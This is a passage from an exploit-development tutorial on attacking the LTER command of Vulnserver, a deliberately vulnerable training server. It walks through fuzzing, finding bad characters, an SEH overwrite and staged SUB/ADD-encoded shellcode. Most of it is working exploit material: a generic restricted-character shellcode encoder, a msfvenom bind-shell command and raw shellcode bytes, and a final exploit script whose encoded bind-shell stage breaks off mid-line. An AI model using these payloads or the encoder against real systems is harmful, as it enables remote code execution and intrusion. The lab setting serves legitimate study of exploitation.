[ExpDev] Vulnserver — Part 7


Vulnserver — Part 7 (LTER — SEH Overwrite + Restricted Character Set)

This is the 7th post in the vulnserver exploit series. This time we will fuzz and exploit the vulnerable LTER command: identify a crash that overwrites the SEH handler, work around the restricted character set by encoding our shellcode, and gain shell access.

Lab Environment

  • OS: Windows 7 (x86)
  • Debugger: OllyDbg, WinDbg (mona.py)
  • Fuzzer: boofuzz
  • Target: Vulnserver — LTER command (SEH Overwrite + Restricted Characters)

* A detailed lab setup guide can be found here:

  • [ExpDev] Vulnserver — Part 1

Initial Recon

Let’s quickly check what the LTER command does.

LTER Command

Fuzzing

Since we already have the fuzzing script from Part 1, we only need small changes to turn it into a fuzzer for the LTER command.

Source: fuzz_lter.py by bigb0ss

As usual, attach vulnserver to OllyDbg, then run the fuzzer.

### Running the Fuzzer
C:\Users\bigb0ss\Desktop\scripts\LTER>python fuzz_lter.py

A few seconds after the fuzzing script starts, vulnserver crashes. From the crash in OllyDbg, we can clearly see that the LTER command followed by a certain number of characters caused it.

Initial Crash

Let’s confirm that the value that overwrote the SEH handler is the ASCII string the fuzzer sent:

>>> "p_.?".encode('hex')
'705f2e3f'

Fuzzing Analysis

From the crash in OllyDbg, about 4000 characters sent to the LTER command caused the crash. We will skip the boofuzz DB file analysis this time.

Exploit

Initial Crash PoC

Let’s create a python script to reproduce the crash.

Source: crash_lter.py by bigb0ss

Start the vulnserver and attach it to OllyDbg. Then, run the crash_lter.py script. We successfully reproduced the crash with our PoC script by overwriting the SEH handler with “A”s.

Reproducing the Crash

Checking for Bad/Restricted Characters

During the initial fuzzing I noticed that the LTER command does not accept some characters. Let’s identify which characters are allowed and which are not.

To do this, I created a simple Python script that generates all hex characters (allHexChar.py).

allHexChar.py

Using the generated character set, let’s update our PoC to determine whether the LTER command has any bad/restricted characters.

Source: badchar_lter.py by bigb0ss

After running the script, we can check which characters survived: only the hex characters from \x01 to \x7F are allowed by the LTER command.

Bad Character Identification
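The comparison itself (what was sent versus what the debugger shows in memory) is done by eye in the post, and the scripts live in the linked gists. The following Python 3 code is an added example, not the author’s script: it builds the all-hex-character probe and works out which bytes were dropped, altered or cut off by walking the probe against a memory dump. The dump here is constructed to mimic what the post found for LTER (bytes \x01..\x7F survive, copying stops at \x80); the function names are mine.

```python
# Added example, not one of the post's scripts: build the bad-character probe
# and work out which bytes the target mangled by comparing what was sent with
# what the debugger shows in memory at the crash.

def all_hex_chars(exclude=(0x00,)):
    """Every byte value in order, minus bytes already known to be bad (NUL by default)."""
    return bytes(b for b in range(256) if b not in exclude)

def find_bad_chars(sent, observed):
    """Walk the probe bytes against the memory dump and return the probe bytes that
    did not survive. Covers the three ways a byte can fail: dropped (the dump skips
    it), altered (the dump holds something else in its slot) and truncated (the dump
    ends early, as when the server stops copying at the first disallowed byte)."""
    bad, j = [], 0
    for i, b in enumerate(sent):
        if j < len(observed) and observed[j] == b:
            j += 1                                  # survived intact
            continue
        bad.append(b)
        # altered in place: the next probe byte lines up one slot further on
        if j + 1 < len(observed) and i + 1 < len(sent) and observed[j + 1] == sent[i + 1]:
            j += 1
    return bad

def allowed_runs(bad, exclude=(0x00,)):
    """Summarise the survivors as inclusive (first, last) ranges, e.g. [(0x01, 0x7F)]."""
    runs, start, prev = [], None, None
    for b in range(256):
        if b in bad or b in exclude:
            if start is not None:
                runs.append((start, prev))
                start = None
        else:
            start = b if start is None else start
            prev = b
    if start is not None:
        runs.append((start, prev))
    return runs

# Constructed dump: the server copied \x01..\x7F and stopped at the first byte >= 0x80,
# which is the behaviour the post reports for LTER.
CONSTRUCTED_DUMP = bytes(range(0x01, 0x80))

if __name__ == '__main__':
    bad = find_bad_chars(all_hex_chars(), CONSTRUCTED_DUMP)
    print('bad bytes start at: \\x%02x (%d in total)' % (bad[0], len(bad)))
    print('allowed ranges:', [('\\x%02x' % a, '\\x%02x' % z) for a, z in allowed_runs(bad)])
```

In practice the dump is the byte string copied out of OllyDbg at the crash, and the exclude list grows with each round: remove the bytes just found, re-send, and compare again until the walk reports nothing new.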

Finding Offset

Next, we need to find the offset at which we control the SEH handler at crash time. Since there are so many bad characters, using pattern_create might be difficult in this situation. There are a couple of ways to accomplish this, but one of the easiest is the manual approach (I covered this in detail in Vulnserver — Part 5 (HTER — EIP Overwrite)).

Source: offset_liter.py by bigb0ss

The offset at which we control the SEH handler is 3520.

Confirming the Offset

Now, we are all set to control the SEH at the crash time.

Finding POP-POP-RET

For a typical SEH overwrite exploit, we need to find a POP POP RET instruction gadget. We will use mona.py’s seh command to search for POP POP RET within the vulnserver application’s DLLs. First, attach vulnserver to WinDbg and run the following command:

### Mona.py Finding "POP POP RET"
!py mona seh -cm safeseh=off -cp nonull,ascii -o -cpb '\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
* The '-cpb' flag specifies which characters are restricted/bad
...snip...
[+] Results :
0x6250160a | 0x6250160a : pop esi # pop ebp # ret | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
0x6250172b | 0x6250172b : pop edi # pop ebp # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
0x6250195e | 0x6250195e : pop edi # pop ebp # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
0x6250120b | 0x6250120b : pop ecx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\bigb0ss\Desktop\software\vulnserver\essfunc.dll)
Found a total of 4 pointers

Let’s use one of the POP POP RET gadgets found; we will use 0x6250120b in our example. Update the PoC script.

Source: pop-pop-ret_lter.py by bigb0ss

Once again, attach vulnserver to OllyDbg and set a breakpoint at the SEH address 0x6250120b.

Breakpoint

When we run the PoC script, we hit the breakpoint at the POP POP RET address. Once we let the exception handler proceed, we land in our 4-byte controlled buffer.

Address after RET Instruction

#1 Stage Shellcode — Conditional JMP (nSEH)

With those 4 bytes of space, we want to jump to the nSEH (next SEH) position. As you may have noticed, we cannot use a normal short jump like \xEB\x80, since \xEB is a bad character for this command, so we need to be a bit creative here.

We can leverage a conditional jump based on the Zero Flag (ZF).

Source: http://unixwiz.net/techtips/x86-jumps.html

JZ (jump if zero) and JNZ (jump if not zero) have single-byte opcodes, \x74 and \x75 respectively, which are both allowed. Since we cannot know whether ZF will be set or clear when execution arrives after the exception handler has run, we place the two conditional jumps one after the other: whatever the state of ZF (ZF == 0 or ZF != 0), one of the two jumps is taken.

### Conditional Jump
\x75\x08         ; JNZ SHORT [+0x10] = Jump if ZF is not 0
\x74\x06         ; JZ SHORT [+0x8]   = Jump if ZF is 0
Conditional Jump in place

This conditional jump redirects execution to the nSEH location, 0x016EFFCE in our example, where we have about 50 bytes of new breathing space.

After the Conditional Jump

#2 Stage Shellcode — Encoded Short JMP

Since we only have a 50-byte buffer, we will most likely need another jump to relocate the pointer to a larger area. But we are still restricted to the allowed character set, so we need a Short JMP (\xEB\x80) first and perhaps a longer JMP afterwards.

We will use SUB encoding to get around the character restrictions. First, we need to adjust the current ESP register to point to where our encoded shellcode will be decoded.

### ESP Alignment (Short JMP)
\x54             # PUSH ESP
\x58             # POP EAX
\x66\x05\x59\x13 # ADD AX,0x1359 (018BFFFD - 016EECA4 = 0x1359)
\x50             # PUSH EAX
\x5C             # POP ESP

Why add 0x1359 to AX? Our current ESP is 0x18BFFFD, and we want ESP to point 2 bytes above the last “C”s (\x43) so that we can place our decoded short JMP (\xEB\x80) there.

ESP Alignment

Next, we place the SUB-encoded short JMP (\xEB\x80) right after the ESP alignment, because, again, \xEB is one of the bad characters. The encoding process works as follows:

1) Zero out EAX
   > AND EAX,0x554e4d4a
   > AND EAX,0x2a313235
2) Pad \xEB\x80 with 2 NOPs to a full dword
   > \xEB\x80\x90\x90
3) Convert it to big-endian (reverse the bytes to get the dword value)
   > 909080EB
4) Hex mathematics (negate it modulo 2^32)
   > 0 - 909080EB = 0xFFFFFFFF - 0x909080EB + 1 = 0x6F6F7F15
5) Convert it to a 33-bit value by prefixing the carry bit (0x100000000), which the 32-bit subtraction discards
   > 0x16F6F7F15
6) Bring the value to 0 using SUB encoding (with ONLY allowed chars)
   0x16F6F7F15
   sub 0x7F7F7F7F
   sub 0x7F7F7F7F
   sub 0x50505002
   sub 0x20203015
   -----------------
   0x00000000

### Encoded Short JMP (SUB Encoding)
\x25\x4A\x4D\x4E\x55    # Zero out EAX
\x25\x35\x32\x31\x2A    #
\x2D\x7F\x7F\x7F\x7F    # Carving \xEB\x80\x90\x90
\x2D\x7F\x7F\x7F\x7F    #
\x2D\x02\x50\x50\x50    #
\x2D\x15\x30\x20\x20    #
\x50                    # PUSH EAX
Encoded Short JMP

Once we step over the shellcode, we can see that the Short JMP (\xEB\x80) is now successfully decoded in our execution path.

Decoded Short JMP

Once we follow the Short JMP, we gain a buffer of about 67 bytes to play with.

After the 2nd Stage Encoded Short JMP

#3 Stage Shellcode — Long JMP

Unfortunately, we still do not have enough space for a payload such as a bind shell. With this newly obtained 67-byte buffer, we will introduce a Long JMP to get around the space restriction. The steps are very similar to the 2nd stage shellcode (Short JMP).

First, let’s align ESP again so that it points to the bottom of the buffer, where our decoded Long JMP will be placed.

### ESP Alignment (Long JMP)
\x54             # PUSH ESP
\x58             # POP EAX
\x2C\x38         # SUB AL,0x38 (0187FFF9 - 0187FFC1 = 0x38)
\x50             # PUSH EAX
\x5C             # POP ESP
ESP Alignment — Long JMP

Next, we place our Long JMP shellcode. Since there are about 3000+ bytes of empty space above our current location, we redirect the pointer to the very beginning of the “A”s, using PUSH ESP → POP EBX → subtract the necessary number of bytes → CALL EBX.

### Long JMP (Shellcode)
\x54                      # PUSH ESP
\x5B                      # POP EBX
\x81\xEB\xB9\x0D\x00\x00  # SUB EBX, 0xDB9
                          # (0187FFC1 - 0187F208 = 0xDB9)
\xFF\xD3                  # CALL EBX
Long JMP Shellcode

As we can see, the first 2 bytes, \x54\x5B, are allowed characters, but the rest need to be encoded. This time we will use the SUB/ADD encoding technique to bypass the restricted character set.

1) Values to encode (one dword each)
   \x81\xEB\xB9\x0D -(big-endian)-> 0DB9EB81
   \x00\x00\xFF\xD3 -(big-endian)-> d3ff0000
2) SUB encoding (d3ff0000), pushed first because it sits at the higher address
   0 - d3ff0000 = 0xFFFFFFFF - d3ff0000 + 1 = 2C010000
   0x12C010000
   sub eax, 7F7F7F7F = AC818081
   sub eax, 7F7F7F7F = 2D020102
   sub eax, 2D020102 = 00000000
   push eax
3) ADD encoding (0DB9EB81)
   add eax, 07657641 = 07657641
   add eax, 06547540 = 0db9eb81
   push eax

### Encoded Long JMP
\x54                      # PUSH ESP
\x5B                      # POP EBX
\x25\x4A\x4D\x4E\x55      # Zero out EAX
\x25\x35\x32\x31\x2A      #
\x2D\x7F\x7F\x7F\x7F      # Carving \x00\x00\xFF\xD3
\x2D\x7F\x7F\x7F\x7F      #
\x2D\x02\x01\x02\x2D      #
\x50                      # PUSH EAX
\x25\x4A\x4D\x4E\x55      # Zero out EAX
\x25\x35\x32\x31\x2A      #
\x05\x41\x76\x65\x07      # Carving \x81\xEB\xB9\x0D
\x05\x40\x75\x54\x06      #
\x50                      # PUSH EAX
Encoded Long JMP
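The hand derivation for the short JMP and the SUB/ADD derivation for the Long JMP are the same procedure applied to one dword at a time. The following Python 3 code is an added example, not code from the post, from Slink or from vulnserver: it automates that procedure (zero EAX with the post’s two AND immediates, find SUB or ADD immediates made only of the \x01..\x7F bytes the LTER test allowed, PUSH EAX) and includes a small emulator that checks the stub decodes to the intended bytes. It searches for the fewest instructions, so it can return shorter chains than the hand-picked ones above (a single SUB of 0x6F6F7F15 already yields \xEB\x80\x90\x90); both decode to the same value. The function names, the constructed inputs and the assumption that only AND/SUB/ADD EAX,imm32 and PUSH EAX are used are mine; the post’s scripts are Python 2, this one is Python 3.

```python
# Added example, not code from the post, Slink or vulnserver: a SUB/ADD encoder
# that automates the hand derivation (zero EAX with two ANDs, SUB or ADD
# immediates built only from allowed bytes, PUSH EAX) plus an emulator that
# checks the stub decodes to the intended bytes before it is used anywhere.
import struct

MASK = 0xFFFFFFFF
ALLOWED = frozenset(range(0x01, 0x80))           # what the LTER bad-char test allowed
ZERO_PAIR = (0x554E4D4A, 0x2A313235)             # the post's AND pair: a & b == 0
OPCODE = {'and': 0x25, 'sub': 0x2D, 'add': 0x05}  # <op> EAX, imm32; each opcode is an allowed byte

def distribute(total, slots, allowed):
    """Split `total` into `slots` bytes drawn from `allowed`, biggest first; None if impossible."""
    if slots == 0:
        return [] if total == 0 else None
    if not slots * min(allowed) <= total <= slots * max(allowed):
        return None
    for b in sorted(allowed, reverse=True):
        if b <= total:
            rest = distribute(total - b, slots - 1, allowed)
            if rest is not None:
                return [b] + rest
    return None

def split_dword(value, allowed, max_parts=4):
    """Fewest dwords made of allowed bytes whose sum equals `value` modulo 2**32.
    Works one byte column at a time from the least significant, carrying upward;
    the carry out of the top byte is discarded, which is the leading '1' of the
    post's 0x16F6F7F15 step."""
    for k in range(1, max_parts + 1):
        parts, carry, ok = [0] * k, 0, True
        for i in range(4):
            need = ((value >> (8 * i)) & 0xFF) - carry
            pieces = None
            for m in range(k + 1):                # this column must total need + 256*m
                col = need + 256 * m
                pieces = distribute(col, k, allowed)
                if pieces is not None:
                    break
            if pieces is None:
                ok = False
                break
            for j, b in enumerate(pieces):
                parts[j] |= b << (8 * i)
            carry = (col + carry) >> 8
        if ok:
            return parts
    return None

def encode_dword(target, allowed=ALLOWED):
    """Instructions that leave `target` in EAX starting from 0: SUB immediates summing
    to -target, or ADD immediates summing to target, whichever chain is shorter."""
    best = None
    for op, value in (('sub', (-target) & MASK), ('add', target)):
        parts = split_dword(value, allowed)
        if parts is not None and (best is None or len(parts) < len(best)):
            best = [(op, p) for p in parts]
    if best is None:
        raise ValueError('0x%08x cannot be built from the allowed bytes' % target)
    return best

def assemble(instrs):
    """(op, imm32) pairs -> x86 bytes: one opcode byte then a little-endian dword."""
    return b''.join(bytes([OPCODE[op]]) + struct.pack('<I', imm) for op, imm in instrs)

def emulate(instrs, eax=0xDEADBEEF):
    """Run an AND/SUB/ADD chain on a 32-bit EAX that starts out holding garbage."""
    for op, imm in instrs:
        eax = {'and': eax & imm, 'sub': (eax - imm) & MASK, 'add': (eax + imm) & MASK}[op]
    return eax

def encode_shellcode(shellcode, allowed=ALLOWED):
    """Decoder stub that rebuilds `shellcode` on the stack: the input is NOP-padded to
    a multiple of 4 and the dwords are pushed last-first, so they land in order just
    below ESP (hence the post's ESP alignment before each stage)."""
    padded = shellcode + b'\x90' * (-len(shellcode) % 4)
    stub = b''
    for i in range(len(padded) - 4, -1, -4):
        target = struct.unpack('<I', padded[i:i + 4])[0]
        chain = [('and', ZERO_PAIR[0]), ('and', ZERO_PAIR[1])] + encode_dword(target, allowed)
        stub += assemble(chain) + b'\x50'         # PUSH EAX
    disallowed = sorted(set(stub) - allowed)      # opcodes and immediates alike must pass
    if disallowed:
        raise ValueError('stub contains disallowed bytes: %r' % disallowed)
    return stub

def run_decoder(stub):
    """Interpret the stub (AND/SUB/ADD EAX,imm32 and PUSH EAX) and return the bytes
    the pushes leave in memory, lowest address first."""
    by_opcode = {v: k for k, v in OPCODE.items()}
    eax, pushed, i = 0xDEADBEEF, [], 0
    while i < len(stub):
        if stub[i] == 0x50:                       # PUSH EAX
            pushed.append(eax)
            i += 1
        elif stub[i] in by_opcode:
            imm = struct.unpack('<I', stub[i + 1:i + 5])[0]
            eax = emulate([(by_opcode[stub[i]], imm)], eax)
            i += 5
        else:
            raise ValueError('unexpected opcode 0x%02x at offset %d' % (stub[i], i))
    return b''.join(struct.pack('<I', v) for v in reversed(pushed))

if __name__ == '__main__':
    # Constructed inputs: the two dword sequences the post encodes by hand.
    for name, code in (('short jmp', b'\xEB\x80'), ('long jmp tail', b'\x81\xEB\xB9\x0D\x00\x00\xFF\xD3')):
        stub = encode_shellcode(code)
        print('%-14s %3d-byte stub decodes to %s' % (name, len(stub), run_decoder(stub).hex()))
```

The byte-column search with a carry is what the post’s leading “1” (0x16F6F7F15, 0x12C010000) expresses: the carry out of the top byte is dropped by the 32-bit subtraction, so the chain only has to sum to the target modulo 2^32. Running `run_decoder` on the stub before sending anything is the cheap way to catch an arithmetic slip in a hand-derived chain.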

Once we step through the encoded shellcode, the Long JMP is rebuilt in its original form.

Decoded Long JMP

Once we go through the Long JMP, we land at the beginning of the “A”s, where we have about 3000+ bytes of empty space for our next payload.

#4 Stage Shellcode — Bind Shell

We are at the final step: getting a bind shell! Before placing the msfvenom bind shell, we again need to align ESP to point to the bottom of the “A”s.

### ESP Alignment (Bind Shell)
\x54             # PUSH ESP
\x58             # POP EAX
\x2C\x3D         # SUB AL,0x3D (0180FFB5 - 0180ff78 = 0x3D)
\x50             # PUSH EAX
\x5C             # POP ESP
ESP Alignment

Let’s generate a msfvenom bind shell.

msfvenom -p windows/shell_bind_tcp LHOST=127.0.0.1 LPORT=443 BUFFERREGISTER=esp EXITFUNC=thread -f c -b "\x00"
* BUFFERREGISTER: this option tells msfvenom that the specified register points at our payload
msfvenom Bind Shell

Our next step would be encoding the shellcode generated by msfvenom. We can definitely do this manually; however, we will be using an awesome encoder called Slink created by @ihack4falafel.

### Encoding with Slink
root@kali:/opt/Slink# python Slink.py 
Enter your shellcode: \x89\xe7\xba\x16\xa7\xf4\x0b\x2b\xc9\xb1\x53\x83\xc7\x04\x31\x57\x0e\x03\x41\xa9\x16\xfe\x91\x5d\x54\x01\x69\x9e\x39\x8b\x8c\xaf\x79\xef\xc5\x80\x49\x7b\x8b\x2c\x21\x29\x3f\xa6\x47\xe6\x30\x0f\xed\xd0\x7f\x90\x5e\x20\x1e\x12\x9d\x75\xc0\x2b\x6e\x88\x01\x6b\x93\x61\x53\x24\xdf\xd4\x43\x41\x95\xe4\xe8\x19\x3b\x6d\x0d\xe9\x3a\x5c\x80\x61\x65\x7e\x23\xa5\x1d\x37\x3b\xaa\x18\x81\xb0\x18\xd6\x10\x10\x51\x17\xbe\x5d\x5d\xea\xbe\x9a\x5a\x15\xb5\xd2\x98\xa8\xce\x21\xe2\x76\x5a\xb1\x44\xfc\xfc\x1d\x74\xd1\x9b\xd6\x7a\x9e\xe8\xb0\x9e\x21\x3c\xcb\x9b\xaa\xc3\x1b\x2a\xe8\xe7\xbf\x76\xaa\x86\xe6\xd2\x1d\xb6\xf8\xbc\xc2\x12\x73\x50\x16\x2f\xde\x3d\xdb\x02\xe0\xbd\x73\x14\x93\x8f\xdc\x8e\x3b\xbc\x95\x08\xbc\xc3\x8f\xed\x52\x3a\x30\x0e\x7b\xf9\x64\x5e\x13\x28\x05\x35\xe3\xd5\xd0\xa0\xeb\x70\x8b\xd6\x16\xc2\x7b\x57\xb8\xab\x91\x58\xe7\xcc\x99\xb2\x80\x65\x64\x3d\xaf\xce\xe1\xdb\xc5\x20\xa4\x74\x71\x83\x93\x4c\xe6\xfc\xf1\xe4\x80\xb5\x13\x32\xaf\x45\x36\x14\x27\xce\x55\xa0\x56\xd1\x73\x80\x0f\x46\x09\x41\x62\xf6\x0e\x48\x14\x9b\x9d\x17\xe4\xd2\xbd\x8f\xb3\xb3\x70\xc6\x51\x2e\x2a\x70\x47\xb3\xaa\xbb\xc3\x68\x0f\x45\xca\xfd\x2b\x61\xdc\x3b\xb3\x2d\x88\x93\xe2\xfb\x66\x52\x5d\x4a\xd0\x0c\x32\x04\xb4\xc9\x78\x97\xc2\xd5\x54\x61\x2a\x67\x01\x34\x55\x48\xc5\xb0\x2e\xb4\x75\x3e\xe5\x7c\x95\xdd\x2f\x89\x3e\x78\xba\x30\x23\x7b\x11\x76\x5a\xf8\x93\x07\x99\xe0\xd6\x02\xe5\xa6\x0b\x7f\x76\x43\x2b\x2c\x77\x46
Enter shellcode variable name: stage4
[!] Shellcode size is not divisible by 4
[+] Padding shellcode with 2 NOPS..
[*] Encoding [90904677]..
[+] No bad character found, using default encoder..
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x23\x50\x50" ## add eax, 0x50502333
stage4 += "\x05\x44\x23\x40\x40" ## add eax, 0x40402344
stage4 += "\x50" ## push eax
[*] Encoding [2c2b4376]..
[+] No bad character found, using default encoder..
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x22\x16\x16" ## add eax, 0x16162233
stage4 += "\x05\x43\x21\x15\x16" ## add eax, 0x16152143
stage4 += "\x50" ## push eax
...snip...

Once Slink completes the encoding of our bind shell, place the payload right next to our ESP alignment shellcode.

Final Exploit

### Final_lter.py (Source by bigb0ss)
import socket
import struct
import os
import sys
vuln_command = "LTER _.?"
crash = 4000
offset = 3520
seh = struct.pack("<I", 0x6250120b) # POP POP RET
# 1st Stage Shellcode (Short JMP - nSEH)
stage1 = ""
stage1 += "\x75\x08" # JNZ SHORT [+0x10] = Jump if ZF is not 0
stage1 += "\x74\x06" # JZ SHORT [+0x8] = Jump if ZF is 0
# 2nd Stage Shellcode (Short JMP - Encoded \xEB\x80)
stage2 = ""
stage2 += "\x54" # PUSH ESP
stage2 += "\x58" # POP EAX
stage2 += "\x66\x05\x59\x13" # ADD AX,0x1359
stage2 += "\x50" # PUSH EAX
stage2 += "\x5C" # POP ESP
stage2 += "\x25\x4A\x4D\x4E\x55" # Zero out EAX
stage2 += "\x25\x35\x32\x31\x2A" #
stage2 += "\x2D\x7F\x7F\x7F\x7F" # Carving \xEB\x80
stage2 += "\x2D\x7F\x7F\x7F\x7F" # \x90\x90
stage2 += "\x2D\x02\x50\x50\x50" #
stage2 += "\x2D\x15\x30\x20\x20" #
stage2 += "\x50" # PUSH EAX
# 3rd Stage Shellcode (Long JMP)
stage3 = ""
stage3 += "\x54" # PUSH ESP
stage3 += "\x58" # POP EAX
stage3 += "\x2C\x38" # SUB AL,0x38
stage3 += "\x50" # PUSH EAX
stage3 += "\x5C" # POP ESP
stage3 += "\x54" # PUSH ESP
stage3 += "\x5B" # POP EBX
stage3 += "\x25\x4A\x4D\x4E\x55" # Zero out EAX
stage3 += "\x25\x35\x32\x31\x2A" #
stage3 += "\x2D\x7F\x7F\x7F\x7F" # Carving \x00\x00
stage3 += "\x2D\x7F\x7F\x7F\x7F" # \xFF\xD3
stage3 += "\x2D\x02\x01\x02\x2D" #
stage3 += "\x50" # PUSH EAX
stage3 += "\x25\x4A\x4D\x4E\x55" # Zero out EAX
stage3 += "\x25\x35\x32\x31\x2A" #
stage3 += "\x05\x41\x76\x65\x07" # Carving \x81\xEB
stage3 += "\x05\x40\x75\x54\x06" # \xB9\x0D
stage3 += "\x50" # PUSH EAX
# 4th Stage Shellcode (Bind Shell)
# msfvenom -p windows/shell_bind_tcp LHOST=127.0.0.1 LPORT=443 BUFFERREGISTER=esp EXITFUNC=thread -f c -b "\x00"
stage4 = ""
stage4 += "\x54" # PUSH ESP
stage4 += "\x58" # POP EAX
stage4 += "\x2C\x3D" # SUB AL,0x3D
stage4 += "\x50" # PUSH EAX
stage4 += "\x5C" # POP ESP
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x23\x50\x50" ## add eax, 0x50502333
stage4 += "\x05\x44\x23\x40\x40" ## add eax, 0x40402344
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x22\x16\x16" ## add eax, 0x16162233
stage4 += "\x05\x43\x21\x15\x16" ## add eax, 0x16152143
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x53\x16\x47" ## add eax, 0x47165363
stage4 += "\x05\x53\x43\x15\x36" ## add eax, 0x36154353
stage4 += "\x05\x62\x43\x13\x35" ## add eax, 0x35134362
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x55\x70\x73\x01" ## add eax, 0x01737055
stage4 += "\x05\x44\x70\x63\x01" ## add eax, 0x01637044
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x35\x74\x42\x14" ## add eax, 0x14427435
stage4 += "\x05\x34\x64\x42\x13" ## add eax, 0x13426434
stage4 += "\x05\x24\x53\x42\x13" ## add eax, 0x13425324
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x22\x46\x11\x43" ## add eax, 0x43114622
stage4 += "\x05\x12\x35\x22\x33" ## add eax, 0x33223512
stage4 += "\x05\x22\x33\x11\x33" ## add eax, 0x33113322
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x27\x34\x65\x20" ## add eax, 0x20653427
stage4 += "\x05\x17\x44\x55\x10" ## add eax, 0x10554417
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x43\x66\x27\x44" ## add eax, 0x44276643
stage4 += "\x05\x43\x66\x16\x44" ## add eax, 0x44166643
stage4 += "\x05\x42\x44\x25\x34" ## add eax, 0x34254442
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x33\x27\x73\x36" ## add eax, 0x36732733
stage4 += "\x05\x42\x17\x72\x46" ## add eax, 0x46721742
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x63\x60\x17\x62" ## add eax, 0x62176063
stage4 += "\x05\x62\x50\x17\x52" ## add eax, 0x52175062
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x11\x23\x33\x34" ## add eax, 0x34332311
stage4 += "\x05\x12\x22\x33\x24" ## add eax, 0x24332212
stage4 += "\x05\x11\x22\x22\x23" ## add eax, 0x23222211
stage4 += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x32\x31\x15\x33" ## add eax, 0x33153132
stage4 += "\x05\x22\x30\x15\x34" ## add eax, 0x34153022
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x34\x53\x61\x73" ## add eax, 0x73615334
stage4 += "\x05\x44\x44\x61\x62" ## add eax, 0x62614444
stage4 += "\x50" ## push eax
stage4 += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
stage4 += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
stage4 += "\x05\x21\x02\x62\x65" ## add eax, 0x65620221
